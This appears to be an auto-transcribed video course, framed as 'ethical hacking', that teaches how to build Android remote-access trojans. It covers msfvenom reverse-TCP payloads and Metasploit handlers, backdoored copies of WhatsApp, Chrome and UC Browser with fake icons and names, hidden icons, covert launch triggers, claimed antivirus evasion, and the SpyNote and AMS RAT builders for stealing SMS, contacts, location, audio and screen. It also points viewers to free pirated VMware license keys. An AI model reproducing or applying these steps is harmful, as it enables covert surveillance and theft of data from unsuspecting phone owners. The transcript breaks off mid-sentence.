Hello and welcome to Ethical Hacking for Mobile Device course. My name is Muhammad Mar and I'm happy to have you here. In this course, you will learn how to test and improve security of mobile phone. You will discover tools and simple steps to check for weak points in device and protect them. We will always focus on ethical and legal ways to use these skills. By the end of this course, you will understand the basic of mobile security, learn about common hacking methods and how to test them safely, practice using tools for mobile penetration testing, know how to secure device and apps from attack. This course is for anyone who wants to learn more about cybersecurity, whether you are just starting or already having some knowledge. The goal is to give you the skills to protect yourself and others online. Ethical hacking is about helping, not harming. Let's start this journey together and make the digital world a safer place. Are you ready? Let's begin. Wait, I wanted to show you something before we beginning. This tablet has been hacked and the payload has been installed on this phone. What does it mean? It means that through this phone I can have a full control over the tablet, like streaming the tablet screen live, turning on the tablet speaker to hear conversation around it, or making a connection with camera. In short, I can remotely control the tablet. We will learn together how to make this happen. See you in the next video. Hello and welcome to Ethical Hacking for Mobile Device course. In this lecture, we will know how to install our working tools. The first tools we need is a virtual machine. Let me now show you how to download it. We will go to Google and write download VMware Workstation Pro. Scroll down and click here. Download now. Workstation Windows and wait. It will be started. Here it's start. It's completely downloaded. Let me show you how to install it. Click next. I accept. Next. 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 Install. It's completely finished. Press license. Here we need a license key. Go to Google and search VMware Workstation VMware Virtual Machine Product Key Free. Okay, press here Press here and you will find a lot of key. Copy any one, go to VM, Control V, copy, Control V to paste it, and click enter. Finish. It's need to restart the system. I will put no. Go to desktop. Here we can see a virtual machine icon. Open it. And now virtual machine is completely installed. I will show you in the next video how to install a Linux version around it. See you in the next video. Hello and welcome to Oscal Hacking for Mobile Device course. In this lecture we will learn how to install a Kali Linux system around a virtual machine. Let's get started. We'll go to Google search bar and write download Kali. Search. Get Kali Linux. Scroll down. And here you can find a virtual machine. Click here to download. It is downloading. I will get back after downloading complete. This is the downloaded file. We need to extract it. Extract here. Okay, it was finished extracting. Here, open the virtual machine. Click here, open a virtual machine. Go to the file. Select this and click open. Here you can find the Kali system. Click bar on to open it. In user write Kali and password write Kali. Login. You can see we are successfully installed a Kali Linux system around a virtual machine. See you in the next video. Hello and welcome to Ethical Hacking for Mobile Device course. We need an Android emulator to test the hacking app that we are gonna create on it. And I wanna tell you that after each lecture we will test our app on a real phone. The first thing, we need to download Android Studio. Let's start. We will gonna search bar and write download Android Studio and click here. Download Android Studio, Ladybug, and here press I have read, click download. It's started downloading. I will come back after downloading complete. Here you can find the Android Studio files that we are downloaded. Open to install. Press yes. Next, next, next. Install. Press next, finish. Next, next. It will be downloaded another file. Press finish. It was finished downloading component. Click finish. New project. No activity. And click finish. You will see here it's downloading a final file. Wait to finish. Okay, all final file is successfully installed. Click device manager and you can see here and automatically Android emulator are installed. Click start. And you can see now we are successfully installed an Android emulator and the lecture is finished. See you in the next lecture. Hello and welcome to Ethical Hacking for Mobile Device course. In this lecture we will learn how to install another Android emulator. It's called LD Player. We'll gonna Google search bar and write LD Player and click here. Download LD and open it. Click yes and install. I will come back after finishing. Okay, now it's finishing installed the LD player. See you in the next lecture. Hello and welcome to Skill Hacking for Mobile Device course. In this lecture we will learn how to create a simple hacking app, and into upcoming lecture we will learn how to develop this app. Okay, let's begin. We need to open a virtual machine and open Kali Linux version, power on. Okay, in user, write Kali and password Kali, enter. Okay, it's opening. Open a terminal and here write msf venom -b android meter breather reverse underscore tcp and lhost. Okay, we stop here. Now we need to know what is my local host. Go to a terminal and write fconfig and enter. Here you can see your local host. Copy and back to the terminal. Here paste port, assign. There is a local port. I will choose 552526 -b to name my app. I will name hack.ebk and enter. Okay, it's finished creation. Open a home and here you can find the hack. Click copy and into a desktop, click paste. Okay, you should off the Windows security from here and from manage setting. Make all this off. Now we need to test this hacking app. Open the LD player and here install the hacking app around the Android emulator LD player. Now we need to configure the Kali Linux to receive the signal from the Android emulator, write msf console and enter to open a Metasploit framework. Wait for open. And here write use exploit multi handler and enter. Set payload Android meter breather reverse underscore TCP and enter. Set L host 192.168.186.29. Let me ensure 168.126.29 and enter. Set L port 2526 and enter. Exploit enter. Now we are finishing configuration. Open the LD player and click to open our hacking application. Okay, it's received the signal from the Android emulator. Here write sysinfo. Okay, this is the information from the signal Android emulator. Write help to see the commands that you can do around it. Okay, app install, to install app list, to view the app that installed into a phone, app run, app uninstall, send SMS, hide app icon, to hide our hack application into a phone. We have a webcam stream, snap, list, chat, record mic, and we have screen share, screenshot. As you can see, we have many commands. That meaning that we are having a full control around the phone. We are finishing this lecture, and into the next lecture I will see you a real test around a real phone. See you in the next lecture. Hello and welcome to Ethical Hacking for Mobile Device course. In this lecture we will develop a hacking app so that when we open it, it will send us to a specific link that we will place. Okay, let's begin. First thing, we need to download Head app. So we're going to Google search bar and write Head underscore Head underscore v 3.3.2.210316 unlocked okay, and click here, download APK. Download. Okay. We need to open LD player to install it program. And install. Now we need to open it, and here for expert allow. Okay, new Android app and cancel. Press to this 3 point and colon. Now we need our colon. Go in here and copy this and paste it here. Clone. Enter app src main res layout activity main no, and here copy this. I will take this file in a description. Okay, and paste. Save. Back. Enter Java file stage Metasploit backdoored and main activity.java. No, we need to import web view. Go in here and copy the import line, paste it here. After super, we need to put another code, copy this, and paste. We need to put our link here. So go to Google, put a link for YouTube, copy it, and here delete and paste your link here. From this 3 point, click save. Go to payload, click yes, and here you need to put your local host and your local port. Here your local host 186.29, and here put your port 2526 and click here to build your app. Now we are finishing to build our app. We need to test this. It's ask us to install it or not. Okay, press install. There is a lag in LD player. I don't know why. Okay, close the LD player and open it again. Here you can find our app. We can uninstall it and install it again. You will find it in here, Android data com.aid cache apk, and here you can find our app. Click to install it again. Okay, it's installed now. Here you are. We need to test it. We'll go to VM workstation and open our Linux version. Click power on. Okay, in user put Kali and boss Kali, enter. We need to open Metasploit. MSF console and enter to open Metasploit framework. Okay, use exploit meter breather. Oh, I forget. Use exploit multi handler and enter. Set payload Android meter breather reverse underscore TCP and enter. Set el host 1 9.2.168.186.29. Set el port 2526 and enter. Exploit and enter. Okay, let's start. Going to LED, minimize and open our app. Okay, when we open, let's receive a signal from an Android emulator that we are hacked. Okay, open the app. When we're opening, it's lead us to the YouTube. Okay, it's work. As you see, our app is working and we are finishing the lecture today. See you in the next lecture. Hello and welcome to ethical hacking for mobile device course. In this lecture we'll learn how to inject our hacking application into an application on the phone. Let me explain the idea to you that when we open our hacking application on the phone after installation, it's open a specific application of our choice. Well, how do we do this? We do this by injecting our hacking application with the package name of the application we choose, provided that the application is already on the phone. Now we want to choose the application whose package name will take and inject into our application. Let's start. Okay, now we need to choose the application. Open a LED player emulator. Okay, I will choose a Chrome application. Now we need to know his package name. We will know his package name by a APK Easy Tools program. Let's download it. And in search, write APK Easy Tools version 1 60 portable and enter. Click here. Mirror 1 media fire and download. Okay, it's start downloading. I will come back after downloading complete. Okay, as you can see, the downloading complete. Here is the application. Let's extract it. Extract here and here a program. Now we need to download a Chrome APK file. Chrome APK download, and click here, get the latest version, and download. Okay, I will come back after downloading complete. Okay, as you can see, a Chrome APK file. Open our APK Easy Tools program, open, and go to a Google file and put it here. Okay, you can see a package name here, a package name. Click to copy and go to redirect file, and here click paste. Now we need to open LD player, add program, back to import another VMware application. Source code of VMware, copy, clone get response, and paste here, clone. Okay, open app file, source file, main, Java, stage, Metasploit, backdroid, main activity of Java, and press yes. Go to redirect file and copy, and here after a super class, paste. Click save. Go to a payload and open a payload to put our local host on the local port, and here my local port is 2526 and local host is 186.29, and from this 3 point click save and payload. Now it's building our application. Okay, it's complete. Go back, uninstall this program, press yes. And now we need to install our hacking application. Go to file and Android, data, com.id, cache, APK, and here you can see our hacking application. Click to install, next, install, and here you can see it's completely installing. Go back. Now when we open it, it's open and Chrome application. Let's try again. Open all this file, close, and open again. Okay, it's open a Chrome application. It's working correctly. Now we need to test if we are receive a signal from it or not. Open a VMware and open a Kali Linux, power on. We need to test if it work or not, and we can receive a signal from a hacking application or not. Open a terminal and click MSF console to open a Metasploit workstation framework. And write use exploit Android exploit multi and multi-handler. Enter. Set payload. Android meter breather reverse underscore TCP and enter. Set lhost 192.168.186.29 and enter. Set port 2526 and enter and exploit. Open the LT player and click to open the app, and as you can see we are receiving a signal from our hacking app and application is working correctly. See you in the next lecture. Hello and welcome to Ethical Hacking for Mobile Device course. In this lecture we will learn how to evaluate our hacking application. When we saw to our hacking application icon, we can see a big problem. That if anyone who saw this icon, he will know that is not real. Okay, now we need to solve this problem. To solve this problem, we need to download 3 tools. Java JDK, Java JRE, App Icon Editor. Okay, let's to download these tools. Here, Java JDK, download, and scroll down, click Windows, and here click to the link. Okay, it start downloading. Go to Java GRE downloader and click here, scroll down, and here you can see Windows Offline. Click, and it's download also. Finally, APK icon editor, and click here, and download. Here click download and next, and finally it's start downloading. Okay, as you can see, the downloading complete, and here's the 3 tools that we are downloading. Let's install it. Java JDK, and yes, next. Okay, successfully installed. Close. Java JRE, yes, and install. And successfully installed also. Close. APK icon editor, and yes, next, install. And press finish. Before we beginning, I wanted to tell you that I changed my localhost. Let's to see my new localhost and build a new our hacking app. Open VMware, Kali Linux, power on, we having a problem. Okay, restart, power off, power on again. Okay, for user press Scali and password press Scali and login. Open a terminal. Click fconfig. And as you can see, my local host is 192.168.9.2 excuse me .92.99. Okay, we need to build our hacking app by a new local host. Okay, open LD player AIDE. And here in a payload, scroll down, go to a local host and press 92.29. Okay, and press save and click to payload. Before install, we need to uninstall this app and install a new our hacking app by new local host and click here. Now we need to extract this hacking application into the desktop. Go to file, Android, data, com.id, cache, EBK, and here you can see the app. Click to select and click here and click here and click here. Click to this 3 point and click here. Okay, open our file and go to documents, click here and picture. Okay, you can see this is our hacking application. Click copy and go to desktop and click paste. Okay, here is the application. I remember to tell you that when you install the 3 tools you need to restart your Windows. Let's continue the lecture. Okay, if you remember in the last lecture we built our hacking application by injecting the application with the Google Chrome package name. This means that when we click to open the program, it's open the Google Chrome browser. So we have to change the icon to become the Google Chrome icon. To do this, we have two methods. The first method is to download the Google Chrome PNG image from the browser. The second method is to download the Google Chrome application and take the icon from it. Okay, let me explain the first method. Open a Google Chrome browser and search Chrome icon PNG and click here, save image, and click save. Go to desktop, open APK icon editor and take app, okay, it's open. Here you can see. Okay, go to here, 72 9 96 144 192. Click here, replace icon, go to download and click here, open, yes, replace icon, open, yes, and click here, replace icon, open, yes, and click here, replace icon, open, yes, and you are finished. Click back APK and rename hack app and click save. Click OK. Go to LD player and uninstall this. Click yes. Take this hack app and press it here, and as you can see, we are successfully in changing the icon of our hacking application. Okay, if we open it, it's open. Okay, this is the first method. We need now to changing to the method number 2. The second method is that we download the Google Chrome APK application from the browser. But to save the time, I will try it on the WhatsApp application. I downloaded it recently. Follow the explanation with me. Go to this PC and download. Can see WhatsApp, copy, go to desktop and paste it here, open APK icon editor, hold and put here, and okay, click here and save icon, desktop, click save, and now close this, open APK icon editor into our app, okay, this 7272 and add 72 and click here, replace icon, desktop, and click on WhatsApp, open, okay, and back. We will rename WhatsApp hack and save. Okay, as you can see, it's here. Open LD player and install this and install a new app, and as you can see, the icon is changing to a WhatsApp icon. When we open it, it's open a Chrome. Okay, now we need to check the connection. Go to VMware and password put Kali, open a terminal, and here set MSF console, starting, okay, starting, okay, right, use exploit multi handler, enter, set payload 192.168.92.29. Let me check my localhost. Okay, that's right, and enter, set. Oh no, I forget. I should set payload Android, sorry I forget, meter breather reverse underscore TCP and enter set lhost 192.168.92.99 and enter set port 2526 and enter an exploit and enter. Wait, okay. Going to LD player. When we open our hacking application, the connection is successfully happened. Okay. Okay, as you can see, we are having a successfully connection with our hacking phone. And this lecture is finished. See you in the next lecture. Hello and welcome to Ethical Hacking for Mobile Device course. In this lecture, we'll learn how to evaluate our hacking application. At first glance at our hacking application, we will see that its name is not real. So we will work on solving this problem in this lecture. We must download one tools. Let's start. Go into Google search bar and write APK editor and click here. And click get, scroll down, you will see the tools, click download and it's download now. Okay, it's finished. Go to download, click copy, and desktop click paste. Now we need to install this application in our LD player. Hold and take it here and press to open, allow, and select APK from app, click in our hacking app, common edit, not commit, and here rename it to Chrome and press save. Okay, in APK temp gen, click close, close, and back. Go to file manager, APK editor, TMB. We need to transfer this app to our desktop. Click here to select and go in here and click here and click copy selection here. Go to our file, document, feature, and here our application. Click copy, go to desktop and paste here. Go to LD player, close all application, and uninstall our hacking application. Okay, uninstall. Go to our desktop, hold and take it here, and as you can see we are changing his name to Chrome. Click to open. Okay, and as you can see we are successfully in changing our hacking application name. Now we need to test if we are receiving a signal from it or not. Go to our Linux system, open a terminal and click MSF console to open Metasploit framework. Starting the Metasploit framework console. Starting. Starting. Okay, start. But use exploit multi handler and enter set payload Android meter breather reverse underscore TCP and oh, we are right below the wrong. Okay, again set payload Android meter breather and reverse underscore TCP and enter. Set ال host 192.168.92.29 and enter. Set البورت 2526 and enter. Exploit and press enter. Wait for starting. Okay, it's starting. Open LD, and when we click here, the connection is successfully happened. And as you can see, we are finishing the lecture today. See you in the next lecture. Hello and welcome to Escal Hacking for Mobile Device course. Today we will do something different. We will make our hacking application appear as a calculator, and we will hack the phone by writing a code on this calculator. Let's start. First, we need to download the app cloner tool. I will leave the download link for the tool in the source. Let's start. Click here to download. I downloaded before, so I don't want to download again. Here in desktop, where here, open LD player. I will cancel the download. Go to LD player, and click here to install, and it's installed successfully. Now we need to build our hacking application. Go to our Kali next version, and open a terminal, and here msfvnom to build our hacking application. And for el host, bot 92.99 and rename our hacking application to my app for a symbol, and click enter. Okay, it's built successfully. Open home. Oh, I do something wrong. Back. I think again MS Venom. Oh, found it. And click enter. Build successfully. Open home, and here click copy and paste here. Open LD player and hold and take it here to install our hacking application. Open app cloner. It is here and finish. From here you can choose our hacking application. Scroll down, privacy option, and fake calculator. Press here to on. Now write your code that when you will enter, you will hack the phone. Press type 2001 and OK. Back, scroll up and rename calc and press OK. Press here to clone, allow, OK. Install app, successfully cloned, and install. Successfully installed calc. Back. Here you can find our hacking application. Now we need to test signal. Back to Kali Linux and click MSF console to open Metasploit framework. It's starting. Now type use exploit multi handler and enter. Set by load Android meter breather reverse underscore TCP and enter. Set L host 192.16 8.92.29 and enter. Set L port 5566 and enter and type exploit. Okay, it's started. Open LD player and press on calc, and here type 2001, and as you can see, when we type our coding, we are receiving a signal from the phone we hacked. Okay, let's help, and as you can see, we are successfully hacking the phone, and we are finishing this lecture. See you in the next lecture. Hello and welcome to Ethical Hacking for Mobile Device course. Today we will learn how to hack a mobile phone through the headphone jack. The method is after installing our hacking application on the mobile phone, we will hack the phone by putting the headphone in the phone. This will work as a key to connect between the phone and Metasploit. I want to inform you that we will not be able to test the program whether it's work or not, because we are using an emulator and not a real phone. Try this application with yourself. Let's get started. Here we have our application and app cloner. Open app cloner and finish, and here you can find our hacking application. Press on it, scroll down, and you can see launching option. Scroll down until you found headphone jack. Here, headphone events. Click here to open, and here you can find headphone connected event action. Start app, excuse me, and press OK. Back and rename headphone and press OK. Click here to clone, allow, and OK. And here we are successfully built a headphone hack app. And as you can see, we are successfully built our hacking application by a headphone jack, and we are finishing the lecture today. See you in the next lecture. Hello and welcome to Ethical Hacking for Mobile Device course. Today we will learn how to hack a mobile phone through the phone's charging port. The method is after installing our hacking application on the mobile phone, we will hack the phone by placing the charging jack in the phone. This will work as a key to connect between the phone and Metasploit. I want to inform you that we will not be able to test the program whether it's work or not, because we are using an emulator and not a real phone. Try this application with yourself. Let's get started. Here we have our hacking application and app cloner. Open app cloner, choose main activity, scroll down and you can find launching option. Scroll down and here you can find power event. Press here to on and start the app. Click OK. Back. Rename. Charging app and click OK. Click here to clone. Allow and OK. Press install app. Click next and install. And here successfully installed charging app. And we are finishing the lecture today. See you in the next lecture. Hello and welcome to Scale Hacking for Mobile Device course. Today we will learn how to hack a mobile phone by calling a specific code that we specify. The method is after installing our hacking application on the mobile phone. We will hack the phone by opening the calling application and putting our code on it. This works as a key to connect between the phone and Metasploit. I want to inform you that we will not be able to test the program, whether it works or not, because we are using an emulator and not a real phone. Try this application by yourself. Let's get started. Here we have our hacking application and app cloner. Open app cloner and select our hacking application. Scroll down, press launching option, scroll down. You can read this. We have here a lot of events that we can do around our hacking application. Scroll down and here you can find secret dialer code. Click here to on and here put your code. I'll put 02001 and here you can find your code. Star window 2001 window star. When you call this code in your phone, you are open a connection with a Metasploit. Click OK and back. Rename it. Call app and click OK. Here click cancel and click clone, allow and OK and install app. Oh sorry, next and click install. Successfully installed call app. And we are finishing the lecture today. See you in the next lecture. Hello and welcome to Ethical Hacking for Mobile Device course. Today we will learn something new that will take us a big steps forward into the world of professionalism. Today you will learn how to integrate the payload of our hacking program into any program we choose. I will choose the official WhatsApp application. To do this, we need to download two tools, APK Easy Tools and Notepad++. Let's get started. In search bar, type APK Easy Tools version 1.57.portable and press here. Scroll down, mirror one media fire and download. And write Notepad++, download the last version, click here and download. Let's download also. Type download WhatsApp APK and click here and click here and here click ignore. Okay, here the three tools we need: APK Easy Tools and Notepad++ and WhatsApp of official version. Click here to extract and wizard and click finish. Okay, it's extract, close here, and we need to install Notepad++. Yes. Okay. Next. I agree. Next. Install. Okay. Click finish. And here you can see this is our hacking application that we are made from Metasploit framework. Okay, now open APK Easy Tool and take the official WhatsApp and press decompile. As you can see here, the launch activity com.whatsapp.main, so that the file of launch activity is the main. Wait until decompile. Okay, I will come back after decompile. Okay, it's decompiled successfully. Click OK and take our hacking application and decompile also. Decompile successfully. Click OK. Click decompile APK directory and allow. And here you can see the file of WhatsApp and file of our hacking application. Open and smiley and Metasploit. Back and copy Metasploit. Go to WhatsApp, smiley, and paste here. if you remember our launch activity file his name is main, so we need to search to a file of named main, click WhatsApp. So again, now open WhatsApp, smiley, paste Metasploit here and open WhatsApp and search for a file. His name is main.smiley. So here is main.smiley. Come back to Metasploit, stage main service.smiley and edit with notepad. Scroll down and copy this, and now go to the main file WhatsApp, scroll down, main.smiley, edit with notepad, and here Control F and write on create and find next until you can see on create and Landroid, invoke super, click enter and paste the line here and click here to save. Now close, go to decompile APK, open APK program and take out WhatsApp here and press compile. Now it's compiling APK file. I will come back after finish. Okay, as you can see, signed successfully. Click OK and compile the APK director. Allow, and here you can see the WhatsApp APK after compiling. Open LD player to install. Okay, it's installing. Click to open, and as you can see, WhatsApp is open. Now close and go to Kali Linux version to test signal from our hacking application. Open terminal and click MSF console, enter to open Metasploit framework. and here use exploit multi handler, enter, set by load Android meter operator reverse underscore tcv and enter, set الهوست 192.168.92.29 and enter, set البورت, the local port is 2526 and enter, and exploit and enter. Wait until starting. Okay, it's started. Now go to LD and click on WhatsApp, and as you can see, when we clicked, we are receiving a signal from our Kali Linux. Click help and enter, and as you can see, we are hacked the phone we target, and we are finishing the lecture today. See you in the next lecture. Hello and welcome to Ethical Hacking for Mobile Device course. This part is for the previous lecture. Today we will learn how to know the launch file when it's protected or blocked. I will try on modified a version of WhatsApp to show you how it's blocked and how we know it. Let's start. Now we have a WhatsApp version, a modified version, and APK is tools. Open APK and open, click allow, and take the modified version of WhatsApp here, and as you can see, the package name com.whatsapp and launch activity is blocked or protected. So we need to know the launch activity file. Click decompile and yes. I will come back after the compile. Okay. 1 minute. It's decompiled successful. Click OK and click decompile. After click decompile APK directory, copy the package name and open decompile APK directory. Allow. And go to. Now we need to open Android manifest. Edit with Notepad, and here Control F and paste the package name. Now we are searching for a file. His name is Android target activity .com.whatsapp 2+. So find next Android name, not Android target, Okay, fine, next. Android name also, fine, next, fine, next. We search for Android target. Okay, fine, next. All of this Android target, all of this is Android name, fine, next. Not Android target, fine, next. All of this Android name, we search for Android target activity, all of this Android name, fine, next, fine, next, fine, next. Fine, next. Android name, Android name, Android name also, fine, next. Android name, Android name, type, Android name, all of this Android name, Android name, name, fine, next. Find the next, and we have reached it. Android target activity com.whatsapp 2 plus, where is it? Here, Android target activity com.whatsapp 2 plus dot main. So our launch activity is main, and his extension in com.whatsapp 2 dot main. So open the file, open smiley com WhatsApp 2 plus, and here you can find our launch file. And the lecture is finished. See you in the next lecture. Hello and welcome to Iskal Hacking for Mobile Device course. Today we will practice the information we explained in the last lecture, which is integrate our payload into another application. We will apply it to a small version of UC browser. Let's get started. Now we need to go to search bar and type UC browser download mini APK. We need a mini version of UC browser. So I'm going here and older version and search for a small version. Okay. .16. I think it is a small version. If you see, let's see size. Okay, size is 1.5 megabyte, so it's the smallest version of UC browser. Let's download. Okay, it's downloading. Click here and cut, go to desktop and paste it here. Sorry, cancel. Okay, this is our user browser of mini version, and this is our hacking application. I make it by Metasploit and APK. So open APK. And take a UC browser and make decompile. I will come back after decompiling. Okay, it's decompiled successfully. So we need to decompile also our hacking application and decompile. Decompile successfully. Click OK and go to decompile file. Go to our hacking application, smally. Come and copy meta, go to UC, smally, come and paste. So go to meta stage, main service, the smiley, and edit with notepad. Scroll down and copy this line and exit. Now we need to know the launch file of UC browser. Take a UC browser again to APK, and here you can see the launch activity file com.uc.browser.activity browser. So going to decompile UC com.smiley.browser.activity .browser com.uc.browser.activity browser. Now we need to search the activity browser file here activity browser to smiley, and edit with notepad. Search for on create and find next, and here you can find invoke super and on create Landroid. Click enter and paste a line here. Okay, save a file and exit. And exit, and now going to APK is to portable. Open this and take a file of UC browser and put it here and click compile. It's compiling APK file. Sign APK file and sign successful. Click OK and go to compile APK directory and rename UC. Click copy and paste in desktop. Now open LD player and install UC. Okay, it's installing. Now we need to test if we are receiving a signal or not. Open, click Kali. Open a terminal and MSF console to open Metasploit framework. Starting the Metasploit framework console. Wait until finish and type use exploit multi handler and set payload Android meter set host 192.168.92.29 and enter. Set port 2526 and enter and exploit. Wait until starting. And as you can see, we are receiving a signal from a UC browser. As you can see, type sysinfo. As you can see, we are receiving a signal from our hacking application UC browser version around LD player. and we are finishing the lecture today. See you in the next lecture. Hello and welcome to Skill Hacking for Mobile Device course. Today we will explain some of the most important Metasploit commands that can be applied to the hacked device. Let's get started. Now open a terminal and type msf console to open Metasploit framework. Wait until starting. Okay. Use Metasploit multi and Android set payload Android me and set l host, set your local host and enter and set l port 2526, enter and exploit. And go to your target hacking application. And when you open, let's open a session in your Metasploit. Now click this info and enter and click help to view your commands. Okay, now all these commands you can do in your target hacking application. So I have here app install, app list, app run, app uninstall. So I will type app list to open all apps. Okay, as you can see, we have a WhatsApp, we have a UC Mini in our hacking phone. So I want to run, if I wanted to run a WhatsApp, I will copy his package name and go into a command app run app underscore run and the package name of the app you wanted to run, paste here and enter, and as you can see here, it's open a WhatsApp. back to Metasploit, and if we wanted to, this is a command of app uninstall, type app underscore uninstall and the package name of app which you want to uninstall and package name. Done request. Let's send a request to your target phone. So this is the request. If you type OK, the WhatsApp are uninstall and cancel. Let's see more command. Click help, and you can see here dump SMS to get SMS message. Let's try, but I think it not work because our target phone not a real phone. But let's test. Click dump, type dump underscore SMS. So it's exactly not work because our target phone isn't a real phone. We have here hide app icon and explain of this command. Typing here and send MS. We have here record mic, webcam chat, webcam list. We have a screen share. If we copy this command and paste here, it will open a session of the screenshot. The screen share of your target phone. As you can see, if I press here or press here, we have a screen share from our target phone. As you can see, we have a screen share. So we need to exit. Sorry, we need to write a command again. Use okay, help. We have also screenshot. Let's test. Okay, let's take a screenshot and save it into home Kali, and this name of our screenshot. Let's go to home, and here you can see the screenshot which has token. Okay, it's work. File system command. If we are wanted to take a picture from any file into our target phone, we can use this command. Let's try. ls we have now we need to go cd here, ls cd let's see command again. Okay, so the cd is to open a file and ls to sort a file around the file you open with a cd. Search for a file, and as you can see we have tested the important command around Metasploit, and we are finished this lecture. See you in the next lecture. Hello and welcome to Ethical Hacking for Mobile Device course. Today we will talk about the issues of bypassing Google protection or any virus program. Some of us, when installing our hacking application on the hacker device, Google Play Protection or any other virus program tells the victim that this application is harmful and carries viruses. So far we must solve this problem. I said that some of people are the ones who made this problem, not everyone. To solve this problem, we must take our hacking application to the APK Tools program to sign it. To do this, we must decompile the application and then compile it again. Let's start. I will actually show you this. And as you can see, we can open APK tool and open a program. Allow. can take our hacking application into APK easy tool and decompile it. It's decompiling. After decompiling, we must do compile. So we need to sign APK application. To sign it, we must compile application to go to sign APK. So as you can see, we must compile. See here, compiling APK and signing APK file. Sign successfully. Okay. And by our hacking application, we can bypassing the Google protection or any virus program. And we are finishing this lecture. See you in the next lecture. Hello and welcome to Oscar Hacking for Mobile Device course. Today we will learn how we can receive a signal from a two devices at the same time. Let's start and follow the explanation with me. We are having here a LD player, Android emulator, and here a Nox player, Android emulator. I installing a UC browser here, our hacking application, and installing a UC browser here, our hacking application. Now we need to test if we can receive a signal from two Android emulator at the same time. Let's start. Now open a terminal and open Metasploit framework and open another terminal and open Metasploit framework. Okay, and type use exploit multi handler and enter set pay load Android meter breather reverse underscore TCP and enter and set L host one nine two dot 168.92.99 and enter and set L port 5566 and enter and then type exploit. Okay, it's starting. If we click here, we'll receive a signal from our LD player. Okay, let's copy our command. Copy this line, paste here, and copy this line and paste here, and copy this line and paste here, and copy our local port and paste here, and finally copy exploit and paste and exploit. Okay, if we click in Nox Player Android Emulator, it will receive a signal also. So if we type here sysinfo Android 9, and here sysinfo Android 7.1.2, and as you can see, we are successfully do our target in this lecture. So we are finishing the lecture today. See you in the next lecture. Hello and welcome to Ethical Hacking for Mobile Device course. Today we will learn something new. In the past we built our own hacking app from scratch, and together we followed the stages of the app development and how we develop it into a professional app. Today we will summarize everything we learned in previous lesson using hacking tools. Hacking tools are ready-made programs that fully hack a phone. They include the GUI feature, which is a user interface feature that makes the tools easier to use. We will start by installing the AMS framework. Let's get started. First thing, we will open a VM workstation and open a Kali Linux version. Open a browser and search AMS. Scroll down, and when you see a marshmallow AMS, click to open. Scroll down, and here you can see we use a Kali Linux version, so it's a binary setup. And here click binary setup Linux and scroll down again. Our system is a Kali Linux, so click on Kali Linux and scroll down, and here we need to install a Java JDK 11. So copy this and go to terminal and Control Shift V to paste and enter. Click our password for Kali and enter. And it's already installing. So the next thing, if our Kali Linux version is 32-bit, we need to install a zip line. So our Kali Linux version is 64-bit, so we don't need to install this feature. Okay, scroll down and download a binary release from this link. Click open link in new tab and here startup AMD64.deep. Click here to download and it's starting downloading. Wait after downloading complete. Okay, open folder and go in here, click copy, go to terminal and type cd and Control Shift V to paste and click enter. So click ls and you can find our AMS tools. So come back to browser and for installing AMS application package, click this line for 64-bit and this line for 32-bit. So come back to our terminal and paste here and enter. Click our password and enter, and AMS is already the newest version. Okay, now we are finishing installing AMS, so we need to open it. Click here and type AMS and click here. Click on it. AMS. Okay. As you can see, we are installing AMS tools successfully and we are finishing the lecture today. See you in the next lecture. Hello and welcome to Ethical Hacking for Mobile Device course. Today we will learn how to create our hacking application by AMS tools, and we will test it in a virtual phone, which is the LD player. Let's get started. First thing, we need to convert our network on our VM workstation into a bridge connection. So go to setting and network adapter, and here it will be a net, so we will convert it into a bridge and click OK. So now open our AMS tools, AMS, and click APK builder, and here you need to put your IP, and here you need to put your port. So to know our IP, open a terminal and type fconfig and enter. So this is our IP, copy, and here click paste. For your port you can type 2526 or any number you want to type, and here permission customization, select camera, storage, my location, contact, SMS, call logs, and click no and click build. It's building ams.apk. So okay, it's built successfully, and save here home Kali ams output. So open a file, and ams output, and you will see our hacking application here. Click copy, go to into a desktop and paste here. Open our LD and install our hacking application into. Okay, it's successfully installing. So now we need to test if our hacking application is working or not. Open a victims, and here put your port 2526 and click listen. Come back to our LD player and click our hacking application to open, and as you can see it's receive a signal from our LD player. And now we need to see what we can do on our hacking application, our hacking phone. So click here, As you can see, you can open a camera, so it's a virtual. So the camera don't work. Click File Manager. Okay, as you can see, this is a file manager of our hacking phone. So if we click on download file, you can see here the file we can downloading into our Kali Linux version. Come back, go to DCIM, SMBT, mic. Here you will put a second that you want to record. I will put 9 seconds and record. It's recording now at 9 seconds. So this is a virtual machine and it's not connecting to a mic, so it will not work. It's working only on a real phone. So this location, as you can see, this is not a real location because we are hacking a virtual phone, not a real phone. So this location is fake. You will see the real location if you are hacking a real phone. And contacts, sorry, SMS, okay, call logs. As you can see, we're having a full control over our hacking phone, and we are finishing the lecture today. See you in the next lecture. Hello and welcome to Ethical Hacking for Mobile Device course. Today we'll learn a new tools which called Spy Note tools. In this lecture we will learn how to install these tools. Let's get started. From Google search bar write Spy Note GitHub, and when we find forbidden Spy Note version 6.4, click to open, and from code click download, and it's downloading. Click keep, more, keep anyway, and as you can see it is our downloading archive. Click on it and extract here. Here's the file. Click to open, and for this archive extract also, extract here, and open the file, open Spy Note, click yes. Our port 9595. I want to tell you something before installing a Spy Note program. You should downloading Java JDK file and installing it on your PC. So here it tell us no Java was found, select Java Python. So you need to download Java JDK, and in this location put your Java Python. As you can see, we will click here and back to the C, and from C click on program file and Java, and this version of Java is less than Java 8, so I will select it and open bin and select java.exe. Click OK and allow. Wait after installing. Now it's upload our Java version on SpyNote program, and as you can see we are finishing installing our hacking application SpyNote, and in the next lecture I will see you how we can use it. See you in the next lecture. Hello and welcome to Iskal Hacking for Mobile Device course. Today we'll test our hacking tools SpyNote. Let's get started. Open SpyNote. Yes. Our board 9595, click OK, and from tools click payload, and from here this is the victim name and this is app name, which when while installing our hacking application in the phone it seems like system information. So this is our hacking application name, DNS. In DNS info we need to put our IP, so open a CMD as an administrator, and yes, type ipconfig and this is our IP. Copy and paste here. You will see the IP in IP version 4 from Ethernet, adapter Ethernet. So back to our hacking tools. Our port is 9595, and from properties, select hide application, that when our hacking application is installing on our hacking phone, it will be hide, and we don't select this, and select permission root, merging app. So in merging app, we can merge our hacking application with any application we want, and from build our hacking application. It's building our hacking application. And open LD player, installing our hacking application on it. Now open. As you can see, we are receiving a signal from hacking phone, and as you can see, it's hiding because we're selecting a hide application. It took about 5 seconds to hide in our hacking phone. So we're connecting with our hacking phone. Click here, you can see file manager, and as you can see, this is a file manager. From download, we can see our downloading file. From application, you can see this application on our hacking phone. File, application, and as you can see, cache, and this file also found all things in file manager. You can see, and downloading also. Just click on it and download, cut, copy, edit, delete, rename, anything you 